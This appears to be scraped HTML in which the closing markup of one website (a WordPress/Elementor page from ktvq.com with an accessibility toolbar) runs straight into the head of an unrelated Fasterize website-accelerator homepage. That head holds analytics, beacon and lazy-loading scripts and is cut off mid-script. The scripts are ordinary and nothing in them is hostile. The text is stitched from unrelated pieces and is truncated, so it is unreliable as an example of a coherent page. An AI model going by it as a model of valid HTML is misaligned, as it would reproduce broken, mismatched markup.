{"isEditMode":"","is_rtl":"","breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"urls":{"assets":"https:\/\/ktvq.com\/wp-content\/plugins\/elementor\/assets\/"},"settings":{"page":[],"general":{"elementor_global_image_lightbox":"yes","elementor_enable_lightbox_in_editor":"yes"}},"post":{"id":672,"title":"Home","excerpt":""}}; /* ]]> */ </script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=2.1.6'></script> <a id="pojo-a11y-skip-content" class="pojo-skip-link pojo-skip-content" tabindex="1" accesskey="s" href="#content">Skip to content</a> <nav id="pojo-a11y-toolbar" class="pojo-a11y-toolbar-right" role="navigation"> <div class="pojo-a11y-toolbar-toggle"> <a class="pojo-a11y-toolbar-link pojo-a11y-toolbar-toggle-link" href="javascript:void(0);" title="Accessibility Tools"> <span class="pojo-sr-only sr-only">Open toolbar</span> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100" fill="currentColor" width="1em"> <path d="M50 8.1c23.2 0 41.9 18.8 41.9 41.9 0 23.2-18.8 41.9-41.9 41.9C26.8 91.9 8.1 73.2 8.1 50S26.8 8.1 50 8.1M50 0C22.4 0 0 22.4 0 50s22.4 50 50 50 50-22.4 50-50S77.6 0 50 0zm0 11.3c-21.4 0-38.7 17.3-38.7 38.7S28.6 88.7 50 88.7 88.7 71.4 88.7 50 71.4 11.3 50 11.3zm0 8.9c4 0 7.3 3.2 7.3 7.3S54 34.7 50 34.7s-7.3-3.2-7.3-7.3 3.3-7.2 7.3-7.2zm23.7 19.7c-5.8 1.4-11.2 2.6-16.6 3.2.2 20.4 2.5 24.8 5 31.4.7 1.9-.2 4-2.1 4.7-1.9.7-4-.2-4.7-2.1-1.8-4.5-3.4-8.2-4.5-15.8h-2c-1 7.6-2.7 11.3-4.5 15.8-.7 1.9-2.8 2.8-4.7 2.1-1.9-.7-2.8-2.8-2.1-4.7 2.6-6.6 4.9-11 5-31.4-5.4-.6-10.8-1.8-16.6-3.2-1.7-.4-2.8-2.1-2.4-3.9.4-1.7 2.1-2.8 3.9-2.4 19.5 4.6 25.1 4.6 44.5 0 1.7-.4 3.5.7 3.9 2.4.7 1.8-.3 3.5-2.1 3.9z"/> </svg> </a> </div> <div class="pojo-a11y-toolbar-overlay"> <div class="pojo-a11y-toolbar-inner"> <p class="pojo-a11y-toolbar-title">Accessibility Tools</p> <ul class="pojo-a11y-toolbar-items pojo-a11y-tools"> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-resize-font pojo-a11y-btn-resize-plus" data-action="resize-plus" data-action-group="resize" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M256 200v16c0 4.25-3.75 8-8 8h-56v56c0 4.25-3.75 8-8 8h-16c-4.25 0-8-3.75-8-8v-56h-56c-4.25 0-8-3.75-8-8v-16c0-4.25 3.75-8 8-8h56v-56c0-4.25 3.75-8 8-8h16c4.25 0 8 3.75 8 8v56h56c4.25 0 8 3.75 8 8zM288 208c0-61.75-50.25-112-112-112s-112 50.25-112 112 50.25 112 112 112 112-50.25 112-112zM416 416c0 17.75-14.25 32-32 32-8.5 0-16.75-3.5-22.5-9.5l-85.75-85.5c-29.25 20.25-64.25 31-99.75 31-97.25 0-176-78.75-176-176s78.75-176 176-176 176 78.75 176 176c0 35.5-10.75 70.5-31 99.75l85.75 85.75c5.75 5.75 9.25 14 9.25 22.5z""></path></svg></span><span class="pojo-a11y-toolbar-text">Increase Text</span> </a> </li> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-resize-font pojo-a11y-btn-resize-minus" data-action="resize-minus" data-action-group="resize" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M256 200v16c0 4.25-3.75 8-8 8h-144c-4.25 0-8-3.75-8-8v-16c0-4.25 3.75-8 8-8h144c4.25 0 8 3.75 8 8zM288 208c0-61.75-50.25-112-112-112s-112 50.25-112 112 50.25 112 112 112 112-50.25 112-112zM416 416c0 17.75-14.25 32-32 32-8.5 0-16.75-3.5-22.5-9.5l-85.75-85.5c-29.25 20.25-64.25 31-99.75 31-97.25 0-176-78.75-176-176s78.75-176 176-176 176 78.75 176 176c0 35.5-10.75 70.5-31 99.75l85.75 85.75c5.75 5.75 9.25 14 9.25 22.5z"></path></svg></span><span class="pojo-a11y-toolbar-text">Decrease Text</span> </a> </li> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-background-group pojo-a11y-btn-grayscale" data-action="grayscale" data-action-group="schema" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M15.75 384h-15.75v-352h15.75v352zM31.5 383.75h-8v-351.75h8v351.75zM55 383.75h-7.75v-351.75h7.75v351.75zM94.25 383.75h-7.75v-351.75h7.75v351.75zM133.5 383.75h-15.5v-351.75h15.5v351.75zM165 383.75h-7.75v-351.75h7.75v351.75zM180.75 383.75h-7.75v-351.75h7.75v351.75zM196.5 383.75h-7.75v-351.75h7.75v351.75zM235.75 383.75h-15.75v-351.75h15.75v351.75zM275 383.75h-15.75v-351.75h15.75v351.75zM306.5 383.75h-15.75v-351.75h15.75v351.75zM338 383.75h-15.75v-351.75h15.75v351.75zM361.5 383.75h-15.75v-351.75h15.75v351.75zM408.75 383.75h-23.5v-351.75h23.5v351.75zM424.5 383.75h-8v-351.75h8v351.75zM448 384h-15.75v-352h15.75v352z"></path></svg></span><span class="pojo-a11y-toolbar-text">Grayscale</span> </a> </li> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-background-group pojo-a11y-btn-high-contrast" data-action="high-contrast" data-action-group="schema" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M192 360v-272c-75 0-136 61-136 136s61 136 136 136zM384 224c0 106-86 192-192 192s-192-86-192-192 86-192 192-192 192 86 192 192z""></path></svg></span><span class="pojo-a11y-toolbar-text">High Contrast</span> </a> </li> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-background-group pojo-a11y-btn-negative-contrast" data-action="negative-contrast" data-action-group="schema" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M416 240c-23.75-36.75-56.25-68.25-95.25-88.25 10 17 15.25 36.5 15.25 56.25 0 61.75-50.25 112-112 112s-112-50.25-112-112c0-19.75 5.25-39.25 15.25-56.25-39 20-71.5 51.5-95.25 88.25 42.75 66 111.75 112 192 112s149.25-46 192-112zM236 144c0-6.5-5.5-12-12-12-41.75 0-76 34.25-76 76 0 6.5 5.5 12 12 12s12-5.5 12-12c0-28.5 23.5-52 52-52 6.5 0 12-5.5 12-12zM448 240c0 6.25-2 12-5 17.25-46 75.75-130.25 126.75-219 126.75s-173-51.25-219-126.75c-3-5.25-5-11-5-17.25s2-12 5-17.25c46-75.5 130.25-126.75 219-126.75s173 51.25 219 126.75c3 5.25 5 11 5 17.25z"></path></svg></span><span class="pojo-a11y-toolbar-text">Negative Contrast</span> </a> </li> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-background-group pojo-a11y-btn-light-background" data-action="light-background" data-action-group="schema" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M184 144c0 4.25-3.75 8-8 8s-8-3.75-8-8c0-17.25-26.75-24-40-24-4.25 0-8-3.75-8-8s3.75-8 8-8c23.25 0 56 12.25 56 40zM224 144c0-50-50.75-80-96-80s-96 30-96 80c0 16 6.5 32.75 17 45 4.75 5.5 10.25 10.75 15.25 16.5 17.75 21.25 32.75 46.25 35.25 74.5h57c2.5-28.25 17.5-53.25 35.25-74.5 5-5.75 10.5-11 15.25-16.5 10.5-12.25 17-29 17-45zM256 144c0 25.75-8.5 48-25.75 67s-40 45.75-42 72.5c7.25 4.25 11.75 12.25 11.75 20.5 0 6-2.25 11.75-6.25 16 4 4.25 6.25 10 6.25 16 0 8.25-4.25 15.75-11.25 20.25 2 3.5 3.25 7.75 3.25 11.75 0 16.25-12.75 24-27.25 24-6.5 14.5-21 24-36.75 24s-30.25-9.5-36.75-24c-14.5 0-27.25-7.75-27.25-24 0-4 1.25-8.25 3.25-11.75-7-4.5-11.25-12-11.25-20.25 0-6 2.25-11.75 6.25-16-4-4.25-6.25-10-6.25-16 0-8.25 4.5-16.25 11.75-20.5-2-26.75-24.75-53.5-42-72.5s-25.75-41.25-25.75-67c0-68 64.75-112 128-112s128 44 128 112z"></path></svg></span><span class="pojo-a11y-toolbar-text">Light Background</span> </a> </li> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-links-underline" data-action="links-underline" data-action-group="toggle" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M364 304c0-6.5-2.5-12.5-7-17l-52-52c-4.5-4.5-10.75-7-17-7-7.25 0-13 2.75-18 8 8.25 8.25 18 15.25 18 28 0 13.25-10.75 24-24 24-12.75 0-19.75-9.75-28-18-5.25 5-8.25 10.75-8.25 18.25 0 6.25 2.5 12.5 7 17l51.5 51.75c4.5 4.5 10.75 6.75 17 6.75s12.5-2.25 17-6.5l36.75-36.5c4.5-4.5 7-10.5 7-16.75zM188.25 127.75c0-6.25-2.5-12.5-7-17l-51.5-51.75c-4.5-4.5-10.75-7-17-7s-12.5 2.5-17 6.75l-36.75 36.5c-4.5 4.5-7 10.5-7 16.75 0 6.5 2.5 12.5 7 17l52 52c4.5 4.5 10.75 6.75 17 6.75 7.25 0 13-2.5 18-7.75-8.25-8.25-18-15.25-18-28 0-13.25 10.75-24 24-24 12.75 0 19.75 9.75 28 18 5.25-5 8.25-10.75 8.25-18.25zM412 304c0 19-7.75 37.5-21.25 50.75l-36.75 36.5c-13.5 13.5-31.75 20.75-50.75 20.75-19.25 0-37.5-7.5-51-21.25l-51.5-51.75c-13.5-13.5-20.75-31.75-20.75-50.75 0-19.75 8-38.5 22-52.25l-22-22c-13.75 14-32.25 22-52 22-19 0-37.5-7.5-51-21l-52-52c-13.75-13.75-21-31.75-21-51 0-19 7.75-37.5 21.25-50.75l36.75-36.5c13.5-13.5 31.75-20.75 50.75-20.75 19.25 0 37.5 7.5 51 21.25l51.5 51.75c13.5 13.5 20.75 31.75 20.75 50.75 0 19.75-8 38.5-22 52.25l22 22c13.75-14 32.25-22 52-22 19 0 37.5 7.5 51 21l52 52c13.75 13.75 21 31.75 21 51z"></path></svg></span><span class="pojo-a11y-toolbar-text">Links Underline</span> </a> </li> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-readable-font" data-action="readable-font" data-action-group="toggle" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M181.25 139.75l-42.5 112.5c24.75 0.25 49.5 1 74.25 1 4.75 0 9.5-0.25 14.25-0.5-13-38-28.25-76.75-46-113zM0 416l0.5-19.75c23.5-7.25 49-2.25 59.5-29.25l59.25-154 70-181h32c1 1.75 2 3.5 2.75 5.25l51.25 120c18.75 44.25 36 89 55 133 11.25 26 20 52.75 32.5 78.25 1.75 4 5.25 11.5 8.75 14.25 8.25 6.5 31.25 8 43 12.5 0.75 4.75 1.5 9.5 1.5 14.25 0 2.25-0.25 4.25-0.25 6.5-31.75 0-63.5-4-95.25-4-32.75 0-65.5 2.75-98.25 3.75 0-6.5 0.25-13 1-19.5l32.75-7c6.75-1.5 20-3.25 20-12.5 0-9-32.25-83.25-36.25-93.5l-112.5-0.5c-6.5 14.5-31.75 80-31.75 89.5 0 19.25 36.75 20 51 22 0.25 4.75 0.25 9.5 0.25 14.5 0 2.25-0.25 4.5-0.5 6.75-29 0-58.25-5-87.25-5-3.5 0-8.5 1.5-12 2-15.75 2.75-31.25 3.5-47 3.5z"></path></svg></span><span class="pojo-a11y-toolbar-text">Readable Font</span> </a> </li> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-reset" data-action="reset" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M384 224c0 105.75-86.25 192-192 192-57.25 0-111.25-25.25-147.75-69.25-2.5-3.25-2.25-8 0.5-10.75l34.25-34.5c1.75-1.5 4-2.25 6.25-2.25 2.25 0.25 4.5 1.25 5.75 3 24.5 31.75 61.25 49.75 101 49.75 70.5 0 128-57.5 128-128s-57.5-128-128-128c-32.75 0-63.75 12.5-87 34.25l34.25 34.5c4.75 4.5 6 11.5 3.5 17.25-2.5 6-8.25 10-14.75 10h-112c-8.75 0-16-7.25-16-16v-112c0-6.5 4-12.25 10-14.75 5.75-2.5 12.75-1.25 17.25 3.5l32.5 32.25c35.25-33.25 83-53 132.25-53 105.75 0 192 86.25 192 192z"></path></svg></span> <span class="pojo-a11y-toolbar-text">Reset</span> </a> </li> </ul> </div> </div> </nav> <script type="text/javascript">window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","licenseKey":"7ea52efc7b","applicationID":"62688850","transactionName":"bwNTN0NXXhVWBxZZDlZJcABFX18IGAwHUQVdFBwFXllEA0U=","queueTime":0,"applicationTime":1760,"atts":"Q0RQQQtNTRs=","errorBeacon":"bam.nr-data.net","agent":""}</script></body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head><script> var _prum = [['id', '54c65452abe53de431cdccb2'], ['mark', 'firstbyte', (new Date()).getTime()]]; (function() { var s = document.getElementsByTagName('script')[0] , p = document.createElement('script'); p.async = 'async'; p.src = '//rum-static.pingdom.net/prum.min.js'; s.parentNode.insertBefore(p, s); })(); !function(a){"use strict";function b(){return"complete"===e.readyState?(setTimeout(c,2),!0):!1}function c(){var a,b=[];a=g&&g.timing?g.timing.loadEventEnd-g.timing.fetchStart:Date.now()-i;for(var c=d(),e=0,j=c.length;j>e;e++)c[e].d+h>i&&b.push(c[e]);b.push({d:i,l:a}),f.setItem("uxfirst",JSON.stringify(b))}function d(){var a=f.getItem("uxfirst");return a?JSON.parse(a):[]}var e=a.document,f=a.localStorage,g=a.performance;if(e.addEventListener){var h=72e5,i=Date.now();b()||e.addEventListener("readystatechange",b),a.uxFirst=function(a){var b=d(),c=b.length,e=0;if(a>c)return null;for(var f=0,g=c;g>f;f++)e+=b[f].l;return e/c}}}(this); </script><script>BOOMR_lstart = new Date().getTime();</script> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://www.fasterize.com/xmlrpc.php"> <link rel="stylesheet" media="screen" href="https://www.fasterize.com/fstrz/9eb3ca631a9bb67a9bf7df0f90455b6f61a4c93d26ac594f713b029ec0ab807e.css?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fthemes%2Ffasterize%2Ffstrz-bootstrap.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fthemes%2Ffasterize%2Fhome.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fthemes%2Ffasterize%2Ffont-awesome-4.3.0%2Fcss%2Ffont-awesome.min.css%3Ffrz-v%3D454" /> <link rel="shortcut icon" href="https://www.fasterize.com/wp-content/themes/fasterize/favicon.ico?frz-v=454" type="image/x-icon"> <link rel="icon" href="https://www.fasterize.com/wp-content/themes/fasterize/favicon.ico?frz-v=454" type="image/x-icon"> <!-- This site is optimized with the Yoast SEO plugin v9.7 - https://yoast.com/wordpress/plugins/seo/ --> <title>Improve your webperf! Reduce your loading times and optimize your UX!</title> <meta name="description" content="Fasterize is an all-in-one website accelerator: simple, fast, and customizable. Accelerate your website, keep visitors longer, and boost conversions."/> <link rel="canonical" href="https://www.fasterize.com/en/" /> <meta property="og:locale" content="en_US" /> <meta property="og:locale:alternate" content="fr_FR" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Improve your webperf! Reduce your loading times and optimize your UX!" /> <meta property="og:description" content="Fasterize is an all-in-one website accelerator: simple, fast, and customizable. Accelerate your website, keep visitors longer, and boost conversions." /> <meta property="og:url" content="https://www.fasterize.com/en/" /> <meta property="og:site_name" content="Fasterize" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Fasterize is an all-in-one website accelerator: simple, fast, and customizable. Accelerate your website, keep visitors longer, and boost conversions." /> <meta name="twitter:title" content="Improve your webperf! Reduce your loading times and optimize your UX!" /> <meta name="twitter:site" content="@fasterize" /> <meta name="twitter:image" content="//www.fasterize.com/wp-content/uploads/2016/01/home-md.png" /> <meta name="twitter:creator" content="@fasterize" /> <script>fstrz=!0;;var _gaq=_gaq||[];_gaq.push(["_setSiteSpeedSampleRate",100]),_gaq.push(["_setCustomVar",5,"Fasterize","yes",2]);;FRZ_GLOBAL_CUSTOMER_KEY="29";BOOMR_GLOBAL_CONFIG = {beacon_url: "https://www.fasterize.com/fstrz/r/stats-dc1.fzcdn.net/beacon"};(function(){var f,d,a,b=document.createElement("iframe");b.src="javascript:false";(b.frameElement||b).style.cssText="width: 0; height: 0; border: 0; display: none;";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a);try{d=b.contentWindow.document}catch(c){f=document.domain;b.src="javascript:var d=document.open();d.domain='"+f+"';void(0);";d=b.contentWindow.document}d.open()._l=function(){var e=this.createElement("script");if(f){this.domain=f}e.id="boomr-if-as";e.src="https://www.fasterize.com/fstrz/r/stats-dc1.fzcdn.net/boomerang-0.9.1430837759.js";this.body.appendChild(e)};d.write('<bo' + 'dy onload="document._l();">');d.close()})();;;window.lazySizesConfig={"lazyClass":"lazyfrz","autosizesClass":"lazyautosizes","srcAttr":"data-frz-src","srcsetAttr":"data-frz-srcset","sizesAttr":"data-frz-sizes","init":true,"loadHidden":false};/*! lazysizes - v4.1.5 */ !function(a,b){var c=b(a,a.document);a.lazySizes=c,"object"==typeof module&&module.exports&&(module.exports=c)}(window,function(a,b){"use strict";if(b.getElementsByClassName){var c,d,e=b.documentElement,f=a.Date,g=a.HTMLPictureElement,h="addEventListener",i="getAttribute",j=a[h],k=a.setTimeout,l=a.requestAnimationFrame||k,m=a.requestIdleCallback,n=/^picture$/i,o=["load","error","lazyincluded","_lazyloaded"],p={},q=Array.prototype.forEach,r=function(a,b){return p[b]||(p[b]=new RegExp("(\\s|^)"+b+"(\\s|$)")),p[b].test(a[i]("class")||"")&&p[b]},s=function(a,b){r(a,b)||a.setAttribute("class",(a[i]("class")||"").trim()+" "+b)},t=function(a,b){var c;(c=r(a,b))&&a.setAttribute("class",(a[i]("class")||"").replace(c," "))},u=function(a,b,c){var d=c?h:"removeEventListener";c&&u(a,b),o.forEach(function(c){a[d](c,b)})},v=function(a,d,e,f,g){var h=b.createEvent("Event");return e||(e={}),e.instance=c,h.initEvent(d,!f,!g),h.detail=e,a.dispatchEvent(h),h},w=function(b,c){var e;!g&&(e=a.picturefill||d.pf)?(c&&c.src&&!b[i]("srcset")&&b.setAttribute("srcset",c.src),e({reevaluate:!0,elements:[b]})):c&&c.src&&(b.src=c.src)},x=function(a,b){return(getComputedStyle(a,null)||{})[b]},y=function(a,b,c){for(c=c||a.offsetWidth;c<d.minSize&&b&&!a._lazysizesWidth;)c=b.offsetWidth,b=b.parentNode;return c},z=function(){var a,c,d=[],e=[],f=d,g=function(){var b=f;for(f=d.length?e:d,a=!0,c=!1;b.length;)b.shift()();a=!1},h=function(d,e){a&&!e?d.apply(this,arguments):(f.push(d),c||(c=!0,(b.hidden?k:l)(g)))};return h._lsFlush=g,h}(),A=function(a,b){return b?function(){z(a)}:function(){var b=this,c=arguments;z(function(){a.apply(b,c)})}},B=function(a){var b,c=0,e=d.throttleDelay,g=d.ricTimeout,h=function(){b=!1,c=f.now(),a()},i=m&&g>49?function(){m(h,{timeout:g}),g!==d.ricTimeout&&(g=d.ricTimeout)}:A(function(){k(h)},!0);return function(a){var d;(a=!0===a)&&(g=33),b||(b=!0,d=e-(f.now()-c),d<0&&(d=0),a||d<9?i():k(i,d))}},C=function(a){var b,c,d=99,e=function(){b=null,a()},g=function(){var a=f.now()-c;a<d?k(g,d-a):(m||e)(e)};return function(){c=f.now(),b||(b=k(g,d))}};!function(){var b,c={lazyClass:"lazyload",loadedClass:"lazyloaded",loadingClass:"lazyloading",preloadClass:"lazypreload",errorClass:"lazyerror",autosizesClass:"lazyautosizes",srcAttr:"data-src",srcsetAttr:"data-srcset",sizesAttr:"data-sizes",minSize:40,customMedia:{},init:!0,expFactor:1.5,hFac:.8,loadMode:2,loadHidden:!0,ricTimeout:0,throttleDelay:125};d=a.lazySizesConfig||a.lazysizesConfig||{};for(b in c)b in d||(d[b]=c[b]);a.lazySizesConfig=d,k(function(){d.init&&F()})}();var D=function(){var g,l,m,o,p,y,D,F,G,H,I,J,K=/^img$/i,L=/^iframe$/i,M="onscroll"in a&&!/(gle|ing)bot/.test(navigator.userAgent),N=0,O=0,P=0,Q=-1,R=function(a){P--,a&&a.target&&u(a.target,R),(!a||P<0||!a.target)&&(P=0)},S=function(a){return null==J&&(J="hidden"==x(b.body,"visibility")),J||"hidden"!=x(a.parentNode,"visibility")&&"hidden"!=x(a,"visibility")},T=function(a,c){var d,f=a,g=S(a);for(F-=c,I+=c,G-=c,H+=c;g&&(f=f.offsetParent)&&f!=b.body&&f!=e;)(g=(x(f,"opacity")||1)>0)&&"visible"!=x(f,"overflow")&&(d=f.getBoundingClientRect(),g=H>d.left&&G<d.right&&I>d.top-1&&F<d.bottom+1);return g},U=function(){var a,f,h,j,k,m,n,p,q,r,s,t,u=c.elements;if((o=d.loadMode)&&P<8&&(a=u.length)){for(f=0,Q++,r=!d.expand||d.expand<1?e.clientHeight>500&&e.clientWidth>500?500:370:d.expand,s=r*d.expFactor,t=d.hFac,J=null,O<s&&P<1&&Q>2&&o>2&&!b.hidden?(O=s,Q=0):O=o>1&&Q>1&&P<6?r:N;f<a;f++)if(u[f]&&!u[f]._lazyRace)if(M)if((p=u[f][i]("data-expand"))&&(m=1*p)||(m=O),q!==m&&(y=innerWidth+m*t,D=innerHeight+m,n=-1*m,q=m),h=u[f].getBoundingClientRect(),(I=h.bottom)>=n&&(F=h.top)<=D&&(H=h.right)>=n*t&&(G=h.left)<=y&&(I||H||G||F)&&(d.loadHidden||S(u[f]))&&(l&&P<3&&!p&&(o<3||Q<4)||T(u[f],m))){if(aa(u[f]),k=!0,P>9)break}else!k&&l&&!j&&P<4&&Q<4&&o>2&&(g[0]||d.preloadAfterLoad)&&(g[0]||!p&&(I||H||G||F||"auto"!=u[f][i](d.sizesAttr)))&&(j=g[0]||u[f]);else aa(u[f]);j&&!k&&aa(j)}},V=B(U),W=function(a){s(a.target,d.loadedClass),t(a.target,d.loadingClass),u(a.target,Y),v(a.target,"lazyloaded")},X=A(W),Y=function(a){X({target:a.target})},Z=function(a,b){try{a.contentWindow.location.replace(b)}catch(c){a.src=b}},$=function(a){var b,c=a[i](d.srcsetAttr);(b=d.customMedia[a[i]("data-media")||a[i]("media")])&&a.setAttribute("media",b),c&&a.setAttribute("srcset",c)},_=A(function(a,b,c,e,f){var g,h,j,l,o,p;(o=v(a,"lazybeforeunveil",b)).defaultPrevented||(e&&(c?s(a,d.autosizesClass):a.setAttribute("sizes",e)),h=a[i](d.srcsetAttr),g=a[i](d.srcAttr),f&&(j=a.parentNode,l=j&&n.test(j.nodeName||"")),p=b.firesLoad||"src"in a&&(h||g||l),o={target:a},p&&(u(a,R,!0),clearTimeout(m),m=k(R,2500),s(a,d.loadingClass),u(a,Y,!0)),l&&q.call(j.getElementsByTagName("source"),$),h?a.setAttribute("srcset",h):g&&!l&&(L.test(a.nodeName)?Z(a,g):a.src=g),f&&(h||l)&&w(a,{src:g})),a._lazyRace&&delete a._lazyRace,t(a,d.lazyClass),z(function(){(!p||a.complete&&a.naturalWidth>1)&&(p?R(o):P--,W(o))},!0)}),aa=function(a){var b,c=K.test(a.nodeName),e=c&&(a[i](d.sizesAttr)||a[i]("sizes")),f="auto"==e;(!f&&l||!c||!a[i]("src")&&!a.srcset||a.complete||r(a,d.errorClass)||!r(a,d.lazyClass))&&(b=v(a,"lazyunveilread").detail,f&&E.updateElem(a,!0,a.offsetWidth),a._lazyRace=!0,P++,_(a,b,f,e,c))},ba=function(){if(!l){if(f.now()-p<999)return void k(ba,999);var a=C(function(){d.loadMode=3,V()});l=!0,d.loadMode=3,V(),j("scroll",function(){3==d.loadMode&&(d.loadMode=2),a()},!0)}};return{_:function(){p=f.now(),c.elements=b.getElementsByClassName(d.lazyClass),g=b.getElementsByClassName(d.lazyClass+" "+d.preloadClass),j("scroll",V,!0),j("resize",V,!0),a.MutationObserver?new MutationObserver(V).observe(e,{childList:!0,subtree:!0,attributes:!0}):(e[h]("DOMNodeInserted",V,!0),e[h]("DOMAttrModified",V,!0),setInterval(V,999)),j("hashchange",V,!0),["focus","mouseover","click","load","transitionend","animationend","webkitAnimationEnd"].forEach(function(a){b[h](a,V,!0)}),/d$|^c/.test(b.readyState)?ba():(j("load",ba),b[h]("DOMContentLoaded",V),k(ba,2e4)),c.elements.length?(U(),z._lsFlush()):V()},checkElems:V,unveil:aa}}(),E=function(){var a,c=A(function(a,b,c,d){var e,f,g;if(a._lazysizesWidth=d,d+="px",a.setAttribute("sizes",d),n.test(b.nodeName||""))for(e=b.getElementsByTagName("source"),f=0,g=e.length;f<g;f++)e[f].setAttribute("sizes",d);c.detail.dataAttr||w(a,c.detail)}),e=function(a,b,d){var e,f=a.parentNode;f&&(d=y(a,f,d),e=v(a,"lazybeforesizes",{width:d,dataAttr:!!b}),e.defaultPrevented||(d=e.detail.width)&&d!==a._lazysizesWidth&&c(a,f,e,d))},f=function(){var b,c=a.length;if(c)for(b=0;b<c;b++)e(a[b])},g=C(f);return{_:function(){a=b.getElementsByClassName(d.autosizesClass),j("resize",g)},checkElems:g,updateElem:e}}(),F=function(){F.i||(F.i=!0,E._(),D._())};return c={cfg:d,autoSizer:E,loader:D,init:F,uP:w,aC:s,rC:t,hC:r,fire:v,gW:y,rAF:z}}});</script><script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://www.fasterize.com/en/#website","url":"https://www.fasterize.com/en/","name":"Fasterize","potentialAction":{"@type":"SearchAction","target":"https://www.fasterize.com/en/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Organization","url":"https://www.fasterize.com/en/","sameAs":["https://www.facebook.com/fasterize","https://www.linkedin.com/company/fasterize","https://fr.pinterest.com/fasterize/","https://twitter.com/fasterize"],"@id":"https://www.fasterize.com/en/#organization","name":"Fasterize","logo":"http://www.fasterize.com/wp-content/uploads/2016/08/logo_fasterize_white1.png"}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Fasterize &raquo; Feed" href="https://www.fasterize.com/en/feed/" /> <link rel="alternate" type="application/rss+xml" title="Fasterize &raquo; Comments Feed" href="https://www.fasterize.com/en/comments/feed/" /> <script type="text/frzjs" orig_index="0"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.fasterize.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var 